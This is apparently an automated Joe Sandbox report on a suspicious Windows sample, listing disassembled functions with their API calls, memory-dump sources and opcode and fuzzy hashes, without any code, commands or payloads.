                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00174D1E,001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002), ref: 00174D8D
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00174DA0
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00174D1E,001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000), ref: 00174DC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: 073e18a6e9af43fd527c4f976406648d54d2c504603394560a2b8660a0ccaf5e
                                • Instruction ID: 42286adc43b6447e5a1c4ceec0a82dc098da173af7116daf8408f076b1ae984d
                                • Opcode Fuzzy Hash: 073e18a6e9af43fd527c4f976406648d54d2c504603394560a2b8660a0ccaf5e
                                • Instruction Fuzzy Hash: F3F04F35A40308FBDB129FD4DC49BEDBBB5EF58752F0441A8F949A6660DB309A81CAD0
                                Function 00154E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E9C
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00154EAE
                                • FreeLibrary.KERNEL32(00000000,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                • API String ID: 145871493-3689287502
                                • Opcode ID: 1a6024698cd0fe5148168b84e6f8a5dfd18af3e8c7689f190f5cfefc9d67495a
                                • Instruction ID: be3d013bd8dfdbdf47974ead1180368ea9011aa367aadbbc6be0b0770b288f19
                                • Opcode Fuzzy Hash: 1a6024698cd0fe5148168b84e6f8a5dfd18af3e8c7689f190f5cfefc9d67495a
                                • Instruction Fuzzy Hash: 4FE0CD35E01622DBD2311765AC1DB9F6595EF82F677090115FC10DB100DB74CD8744F4
                                Function 00154E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E62
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00154E74
                                • FreeLibrary.KERNEL32(00000000,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E87
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                • API String ID: 145871493-1355242751
                                • Opcode ID: 832668110094dc01b2eabea40d258678c640547807e14ce180f749cbe5bca192
                                • Instruction ID: b7639192e3c66d02ee714366046c33bc27093985dbd3e6533818d3e8189d924e
                                • Opcode Fuzzy Hash: 832668110094dc01b2eabea40d258678c640547807e14ce180f749cbe5bca192
                                • Instruction Fuzzy Hash: A5D0C231902A61E7A6221B256C09DCF2A18EF85F563090114BC10AA110CF34CD8285D0
                                Function 001C2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2C05
                                • DeleteFileW.KERNEL32(?), ref: 001C2C87
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001C2C9D
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2CAE
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2CC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$Delete$Copy
                                • String ID:
                                • API String ID: 3226157194-0
                                • Opcode ID: c24af82af17b2eaf7f664de1c68e3e9f3ac17fac07ddf536afbef695e45f3233
                                • Instruction ID: 4615b53e8d2ec19ea7ace31d2033b3696d09487e5d0c7df43563d4651fcfb31f
                                • Opcode Fuzzy Hash: c24af82af17b2eaf7f664de1c68e3e9f3ac17fac07ddf536afbef695e45f3233
                                • Instruction Fuzzy Hash: 35B13E71900119ABDF25DBA4CC85FDEB7BDEF69350F1040AAF909A7141EB30DA448B61
                                Function 001DA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 001DA427
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001DA435
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001DA468
                                • CloseHandle.KERNEL32(?), ref: 001DA63D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CloseCountersCurrentHandleOpen
                                • String ID:
                                • API String ID: 3488606520-0
                                • Opcode ID: f43d970dd46c7b9cccfa8862d3ac88050b9e8cf3c76993083068f06eea1ff8c2
                                • Instruction ID: d81b1adf4ea3605746f018c4429fd4f90e5c0d04b8711bf956d938dc5d1db309
                                • Opcode Fuzzy Hash: f43d970dd46c7b9cccfa8862d3ac88050b9e8cf3c76993083068f06eea1ff8c2
                                • Instruction Fuzzy Hash: 11A1A1716043009FD720DF28D886F2AB7E5AF94714F54885DF96A9B392DBB0EC45CB82
                                Function 0018BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001F3700), ref: 0018BB91
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0022121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0018BC09
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00221270,000000FF,?,0000003F,00000000,?), ref: 0018BC36
                                • _free.LIBCMT ref: 0018BB7F
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018BD4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: b1c59df9dc5a73b079a3b9a9f977fe5a962298ae621bf340a483f7147a7a9a28
                                • Instruction ID: c1d7c6c9ea1a6fc1eb2c653fea2e0db6393b865b6372c5ac80b2619db05ff2f5
                                • Opcode Fuzzy Hash: b1c59df9dc5a73b079a3b9a9f977fe5a962298ae621bf340a483f7147a7a9a28
                                • Instruction Fuzzy Hash: 6051D871908219EFCB24FFA59CC59AEB7B8AF64310B10436AF814D71A1EB309F418F50
                                Function 001BE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001BCF22,?), ref: 001BDDFD
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001BCF22,?), ref: 001BDE16
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • lstrcmpiW.KERNEL32(?,?), ref: 001BE473
                                • MoveFileW.KERNEL32(?,?), ref: 001BE4AC
                                • _wcslen.LIBCMT ref: 001BE5EB
                                • _wcslen.LIBCMT ref: 001BE603
                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001BE650
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                • String ID:
                                • API String ID: 3183298772-0
                                • Opcode ID: e9f1f7f81ed2d22c12e80ecce6dd7347809beb3ab4a770d954dd7ea69db08126
                                • Instruction ID: e4e14eb6f10e32388944786fbd4b372fe7c38388edb07f83c299f04b5d9b5507
                                • Opcode Fuzzy Hash: e9f1f7f81ed2d22c12e80ecce6dd7347809beb3ab4a770d954dd7ea69db08126
                                • Instruction Fuzzy Hash: 5E5153B24083859BC724DBA4DC819DF73ECAF95340F00492EF689D7191EF75A68C8766
                                Function 001DB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DBAA5
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DBB00
                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001DBB63
                                • RegCloseKey.ADVAPI32(?,?), ref: 001DBBA6
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DBBB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                • String ID:
                                • API String ID: 826366716-0
                                • Opcode ID: 657680c8d6d806752cbe68fd602fd7a1dd4213e762a873070bc820da0ce8ae33
                                • Instruction ID: 794fa9a652abc7f52174d00c4422fd1d865f7f802576022efa2c4b45f9ce44a3
                                • Opcode Fuzzy Hash: 657680c8d6d806752cbe68fd602fd7a1dd4213e762a873070bc820da0ce8ae33
                                • Instruction Fuzzy Hash: B2612A31208241EFD714DF54C8D1E2ABBE5BF84308F55895EF49A8B2A2DB31ED45CB92
                                Function 001B8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001B8BCD
                                • VariantClear.OLEAUT32 ref: 001B8C3E
                                • VariantClear.OLEAUT32 ref: 001B8C9D
                                • VariantClear.OLEAUT32(?), ref: 001B8D10
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001B8D3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType
                                • String ID:
                                • API String ID: 4136290138-0
                                • Opcode ID: f007cf2f633de0a7c347d8c86cdebb41ad97e14fcdd33fdb89f0eae85f3bf2ca
                                • Instruction ID: 5d89eaa1567797e7967c3384e7f7852d5be5ffef6afd645e0db0477f1390e12d
                                • Opcode Fuzzy Hash: f007cf2f633de0a7c347d8c86cdebb41ad97e14fcdd33fdb89f0eae85f3bf2ca
                                • Instruction Fuzzy Hash: F6516AB5A00219EFCB14CF68C894AEAB7F8FF8D710B15855AE909DB350E730E911CB90
                                Function 001C8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                Download Yara Rule
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001C8BAE
                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001C8BDA
                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001C8C32
                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001C8C57
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001C8C5F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String
                                • String ID:
                                • API String ID: 2832842796-0
                                • Opcode ID: e59500741d3b6a4919e70e43b48bd0b11c54bfa24b336bd5b49937ef85083cf4
                                • Instruction ID: 2780e3c34c26c0cf3772a560e3aedfe3f933597bdbdd8a201400bd3eba70c0ca
                                • Opcode Fuzzy Hash: e59500741d3b6a4919e70e43b48bd0b11c54bfa24b336bd5b49937ef85083cf4
                                • Instruction Fuzzy Hash: 70513835A00215DFCB04DF64D881EADBBF5BF58314F088458E859AB3A2DB31ED55CB90
                                Function 001D8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 001D8F40
                                • GetProcAddress.KERNEL32(00000000,?), ref: 001D8FD0
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 001D8FEC
                                • GetProcAddress.KERNEL32(00000000,?), ref: 001D9032
                                • FreeLibrary.KERNEL32(00000000), ref: 001D9052
                                  • Part of subcall function 0016F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001C1043,?,7529E610), ref: 0016F6E6
                                  • Part of subcall function 0016F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001AFA64,00000000,00000000,?,?,001C1043,?,7529E610,?,001AFA64), ref: 0016F70D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                • String ID:
                                • API String ID: 666041331-0
                                • Opcode ID: 1bcb264de524da8c68fd97e4c9c86c691c9a87ff137934c8bbd553fb17d63559
                                • Instruction ID: 55dbca4feff6290d00a17cd06bc149cb10f36b5ead40adc4df62f888b0303c59
                                • Opcode Fuzzy Hash: 1bcb264de524da8c68fd97e4c9c86c691c9a87ff137934c8bbd553fb17d63559
                                • Instruction Fuzzy Hash: 6F515C35604205DFCB15EF68D4848ADBBF1FF59314B0580A9E81A9F362DB31ED8ACB91
                                Function 001E6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                Download Yara Rule
                                APIs
                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001E6C33
                                • SetWindowLongW.USER32(?,000000EC,?), ref: 001E6C4A
                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001E6C73
                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001CAB79,00000000,00000000), ref: 001E6C98
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001E6CC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Long$MessageSendShow
                                • String ID:
                                • API String ID: 3688381893-0
                                • Opcode ID: 9a7d9f05e04da60fdc43c99a4b5471cb8341ddb7ae7ae70d8a2750c2954d00bf
                                • Instruction ID: 8bde7ba1e71ddbf6e67be9aae008adb3258c26e98a2492320cafce4b546be42b
                                • Opcode Fuzzy Hash: 9a7d9f05e04da60fdc43c99a4b5471cb8341ddb7ae7ae70d8a2750c2954d00bf
                                • Instruction Fuzzy Hash: 8741F735600584AFD724CF6ACC98FAD7BA5EB19390F650228FC99A73E0C371ED41CA80
                                Function 00182051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 63a239796ca843c4b27a952fbeee5dd19c71b93c954a33a1c89f9c7b6852653a
                                • Instruction ID: 70b838e9fca00b8ca448654e9b1d255c0162866eaf89ada6b0eb898f84553216
                                • Opcode Fuzzy Hash: 63a239796ca843c4b27a952fbeee5dd19c71b93c954a33a1c89f9c7b6852653a
                                • Instruction Fuzzy Hash: BB41D376A002009FCB25EF78C885A9DB7F5EF99314F268569E515EB391DB31EE01CB80
                                Function 0016912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • GetCursorPos.USER32(?), ref: 00169141
                                • ScreenToClient.USER32(00000000,?), ref: 0016915E
                                • GetAsyncKeyState.USER32(00000001), ref: 00169183
                                • GetAsyncKeyState.USER32(00000002), ref: 0016919D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorScreen
                                • String ID:
                                • API String ID: 4210589936-0
                                • Opcode ID: 9f756a24147d76ac289acef590693bb1f4f4333c7f1c6cb7949cb0da69e48891
                                • Instruction ID: c32a2d5036ef5c5d77177310a138939da6bd5106d9c9cecd2e6a31c48aa97bb3
                                • Opcode Fuzzy Hash: 9f756a24147d76ac289acef590693bb1f4f4333c7f1c6cb7949cb0da69e48891
                                • Instruction Fuzzy Hash: 2B415E75A0864AEBDF199F68CC44BEEB7B8FF06330F248215E425A72D0C7346A54CB91
                                Function 001C3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetInputState.USER32 ref: 001C38CB
                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001C3922
                                • TranslateMessage.USER32(?), ref: 001C394B
                                • DispatchMessageW.USER32(?), ref: 001C3955
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C3966
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                • String ID:
                                • API String ID: 2256411358-0
                                • Opcode ID: 104c46737bd892c78bc9a54177bc9779ed329bcccbc24e76a682f429c596af81
                                • Instruction ID: de07da64279ef1423df1163ddd52559559d8c7e2f1c386c9d47191b31e3a7bcf
                                • Opcode Fuzzy Hash: 104c46737bd892c78bc9a54177bc9779ed329bcccbc24e76a682f429c596af81
